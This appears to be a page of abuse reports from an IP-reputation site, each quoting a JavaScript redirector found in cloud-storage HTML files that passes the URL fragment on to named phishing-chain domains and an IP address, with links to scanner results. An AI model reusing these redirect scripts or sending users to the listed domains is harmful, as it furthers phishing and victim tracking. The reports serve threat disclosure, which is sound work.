webocean.uk.com
Content:
<script type="text/javascript">
function getHash() {
if (window.loc ...
show morewebocean.uk.com
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://helpinneed.asso.eu.org";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
Script is used by phishing criminals to redirect victims to another domain
Malicious, see
https://urlscan.io/search/#helpinneed.asso.eu.org
https://www.virustotal.com/gui/domain/helpinneed.asso.eu.org
show less
helpinneed.asso.eu.org
https://storage.googleapis.com/8asbncuiuoujo6fc/o3ik7wqdivftp947/81988e6.h ...
show morehelpinneed.asso.eu.org
https://storage.googleapis.com/8asbncuiuoujo6fc/o3ik7wqdivftp947/81988e6.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://helpinneed.asso.eu.org";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
Script is used by phishing criminals to redirect victims to another domain
Malicious, see
https://urlscan.io/search/#helpinneed.asso.eu.org
https://www.virustotal.com/gui/domain/helpinneed.asso.eu.org
show less
https://storage.googleapis.com/bhsales25/bhsales4wd.html
Content:
<script>
var tarcking_param = ...
show morehttps://storage.googleapis.com/bhsales25/bhsales4wd.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.128.4";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com)
Malicious, see
https://www.virustotal.com/gui/ip-address/185.80.128.4/detection
https://urlscan.io/search/#185.80.128.4
show less
https://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href ...
show morehttps://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href = 'http://tourismalaysia.com/anchor'+window.location.href.split('#')[1];</script>
tourismalaysia.com is part of phishing reload chain used by criminals
Malicious, see
https://urlscan.io/search/#tourismalaysia.com
https://www.virustotal.com/gui/url/7e599bf23cfd2d06979d73687e73f546a5669271e37ebc53b3e9fcc4b564b106?nocache=1
show less
tourismalaysia.com
https://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script> ...
show moretourismalaysia.com
https://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href = 'http://tourismalaysia.com/anchor'+window.location.href.split('#')[1];</script>
tourismalaysia.com is part of phishing reload chain used by criminals
Malicious, see
https://urlscan.io/search/#tourismalaysia.com
https://www.virustotal.com/gui/url/7e599bf23cfd2d06979d73687e73f546a5669271e37ebc53b3e9fcc4b564b106?nocache=1
show less
helpinneed.asso.eu.org
https://s3.amazonaws.com/pxzoalrqqt16stg/yk2kgfcewcug4e0/35fcd8a.html
C ...
show morehelpinneed.asso.eu.org
https://s3.amazonaws.com/pxzoalrqqt16stg/yk2kgfcewcug4e0/35fcd8a.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://helpinneed.asso.eu.org";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
Script is used by phishing criminals to redirect victims to another domain
Malicious, see
https://urlscan.io/search/#helpinneed.asso.eu.org
https://www.virustotal.com/gui/domain/helpinneed.asso.eu.org
show less
rentalproperty.uk.com
https://storage.googleapis.com/upwhesn7l06pg3py/7jvkxe2ul1epbefc/9fe31e2.ht ...
show morerentalproperty.uk.com
https://storage.googleapis.com/upwhesn7l06pg3py/7jvkxe2ul1epbefc/9fe31e2.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://rentalproperty.uk.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
Script which takes the string after the # and the domain rentalproperty.uk.com processes the stting to redirect victim to another domain, like plutochairpike.com which is malicious, see https://www.virustotal.com/gui/domain/plutochairpike.com
https://www.virustotal.com/gui/url/fc6fc666ddfdd3d1a4792dc8c991ff869e46539172ae0c25d516e1cf5a9dabab
More, see
https://urlscan.io/search/#rentalproperty.uk.com
show less
https://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href ...
show morehttps://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href = 'http://tourismalaysia.com/anchor'+window.location.href.split('#')[1];</script>
tourismalaysia.com is part of phishing reload chain used by criminals
Malicious, see
https://urlscan.io/search/#tourismalaysia.com
https://www.virustotal.com/gui/url/7e599bf23cfd2d06979d73687e73f546a5669271e37ebc53b3e9fcc4b564b106?nocache=1
show less
https://storage.googleapis.com/b1tr3h2erd32gzeg/bv1re31d2fger.html
Content:
<script>document.loc ...
show morehttps://storage.googleapis.com/b1tr3h2erd32gzeg/bv1re31d2fger.html
Content:
<script>document.location.href = 'http://abqopenhouse.com/anchor'+window.location.href.split('#')[1];</script>
Reloads to abqopenhouse.com and this domain uses the parameters after # to redirect victims to the phishing website, like datawhich.com (https://www.virustotal.com/gui/domain/datawhich.com)
Malicious, see
https://www.virustotal.com/gui/domain/abqopenhouse.com
https://urlscan.io/search/#abqopenhouse.com
show less
https://storage.googleapis.com/65f4g/ddd21c23/trackingh.html
Content:
<script>
var tarcking_par ...
show morehttps://storage.googleapis.com/65f4g/ddd21c23/trackingh.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "apexhorizoncraft.com";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
apexhorizoncraft.com
Malicious, see
https://urlscan.io/search/#apexhorizoncraft.com
Part of phishing reload chainβ¦
show less
https://storage.googleapis.com/lyglqnea2d4g1jp8/ilk1egs4cbujd37p/4577e84.html
Content:
<script ...
show morehttps://storage.googleapis.com/lyglqnea2d4g1jp8/ilk1egs4cbujd37p/4577e84.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://helpinneed.asso.eu.org";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
helpinneed.asso.eu.org
Script is used by phishing criminals to redirect victims to another domain
Malicious, see
https://urlscan.io/search/#helpinneed.asso.eu.org
https://www.virustotal.com/gui/domain/helpinneed.asso.eu.org
show less
https://storage.googleapis.com/ee2mx7hum79w1afm/tp5nbk1ukbd6t7lu/a0b3c5e.html
Source:
<script ty ...
show morehttps://storage.googleapis.com/ee2mx7hum79w1afm/tp5nbk1ukbd6t7lu/a0b3c5e.html
Source:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://rdbqpktpdrlccyjmqquwhl.amsterdamworldwide.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
The strings submitted by the victim after the # are used on. amsterdamworldwide.com to track the identity of the victim and to reload the victim to another domain down in the phishing reload chain. An example of such domain is ecstaticlane.com (malicious, see https://www.virustotal.com/gui/url/8b97d813c214b12f704cecf42b2c8182bb097993e8ed7673d521746121c5ed24)
Other examples: https://urlscan.io/search/#amsterdamworldwide.com
show less
rentalproperty.uk.com
https://storage.googleapis.com/upwhesn7l06pg3py/7jvkxe2ul1epbefc/9fe31e2.ht ...
show morerentalproperty.uk.com
https://storage.googleapis.com/upwhesn7l06pg3py/7jvkxe2ul1epbefc/9fe31e2.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://rentalproperty.uk.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
Script which takes the string after the # and the domain rentalproperty.uk.com processes the stting to redirect victim to another domain, like plutochairpike.com which is malicious, see
https://www.virustotal.com/gui/url/fc6fc666ddfdd3d1a4792dc8c991ff869e46539172ae0c25d516e1cf5a9dabab
You want more malicious domains, see
https://urlscan.io/search/#rentalproperty.uk.com
show less
spinningfastloop.com
Part of phishing reload chain
Malicious, see
https://www.virustotal.com ...
show morespinningfastloop.com
Part of phishing reload chain
Malicious, see
https://www.virustotal.com/gui/domain/spinningfastloop.com
https://urlscan.io/search/#spinningfastloop.com
show less
1wgafz.top
Malicious, see:
https://urlscan.io/search/#1wgafz.top
https://www.virustotal.com/gui ...
show more1wgafz.top
Malicious, see:
https://urlscan.io/search/#1wgafz.top
https://www.virustotal.com/gui/domain/1wgafz.top
show less
apexhorizoncraft.com
Part of phishing reload chain
http://apexhorizoncraft.com/t/4ESFCt56608VcDE ...
show moreapexhorizoncraft.com
Part of phishing reload chain
http://apexhorizoncraft.com/t/4ESFCt56608VcDE408jwvpwzhrdc487CWEFAVGPOKQRYFE130487IQXF869W21
Source:
<script>
setTimeout(function(){
window.location.href = 'https://www.intotechworld.com/3P27SM4/XF5T8L1/?sub1=21&sub2=408-56608&sub3=487-130487-869';
console.log('redirecting to https://www.intotechworld.com/3P27SM4/XF5T8L1/?sub1=21&sub2=408-56608&sub3=487-130487-869');
}, 1000);
</script>
<p></p>
intotechworld.com Is malicious, see
https://www.virustotal.com/gui/domain/intotechworld.com
show less
Part of phishing reliad chain
Malicious, see
https://www.virustotal.com/gui/domain/xmu.actionpro ...
show morePart of phishing reliad chain
Malicious, see
https://www.virustotal.com/gui/domain/xmu.actionprolink.com
https://urlscan.io/search/#xmu.actionprolink.com
show less
https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location ...
show morehttps://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location.href = 'http://weatherthisday.com/anchor'+window.location.href.split('#')[1];</script>
Reloads to weatherthisday.com and uses parameters after # for redirecting to another domain, like qpuue.com
Malicious, see
https://www.virustotal.com/gui/url/045641ae04917162f223915be90e90c3b66ad650dec1051e09b8eb7d7a6571c2
https://urlscan.io/search/#weatherthisday.com
show less
https://storage.googleapis.com/b1tr3h2erd32gzeg/bv1re31d2fger.html
Content:
<script>document.loc ...
show morehttps://storage.googleapis.com/b1tr3h2erd32gzeg/bv1re31d2fger.html
Content:
<script>document.location.href = 'http://abqopenhouse.com/anchor'+window.location.href.split('#')[1];</script>
Reloads to abqopenhouse.com and this domain uses the parameters after # to redirect victims to the phishing website, like datawhich.com (https://www.virustotal.com/gui/domain/datawhich.com)
Malicious, see
https://www.virustotal.com/gui/domain/abqopenhouse.com
https://urlscan.io/search/#abqopenhouse.com
show less
https://storage.googleapis.com/v4e0vd0bhjtqrd4g/lzdwxtwrq2ri9tys/a5f09bf.html
Content:
<script ...
show morehttps://storage.googleapis.com/v4e0vd0bhjtqrd4g/lzdwxtwrq2ri9tys/a5f09bf.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://helpinneed.asso.eu.org";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
helpinneed.asso.eu.org
Script is used by phishing criminals to redirect victims to another domain
Malicious, see
https://urlscan.io/search/#helpinneed.asso.eu.org
https://www.virustotal.com/gui/domain/helpinneed.asso.eu.org
show less
https://storage.googleapis.com/bhsales25/bhsales4wd.html
Content:
<script>
var tarcking_param = ...
show morehttps://storage.googleapis.com/bhsales25/bhsales4wd.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.128.4";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com)
Malicious, see
https://www.virustotal.com/gui/ip-address/185.80.128.4/detection
https://urlscan.io/search/#185.80.128.4
show less
https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location ...
show morehttps://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location.href = 'http://weatherthisday.com/anchor'+window.location.href.split('#')[1];</script>
Reloads to weatherthisday.com and uses parameters after # for redirecting to another domain, like
Malicious, see
https://www.virustotal.com/gui/url/045641ae04917162f223915be90e90c3b66ad650dec1051e09b8eb7d7a6571c2
https://urlscan.io/search/#weatherthisday.com
show less
PhishingEmail Spam
By clicking βAccept allβ, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.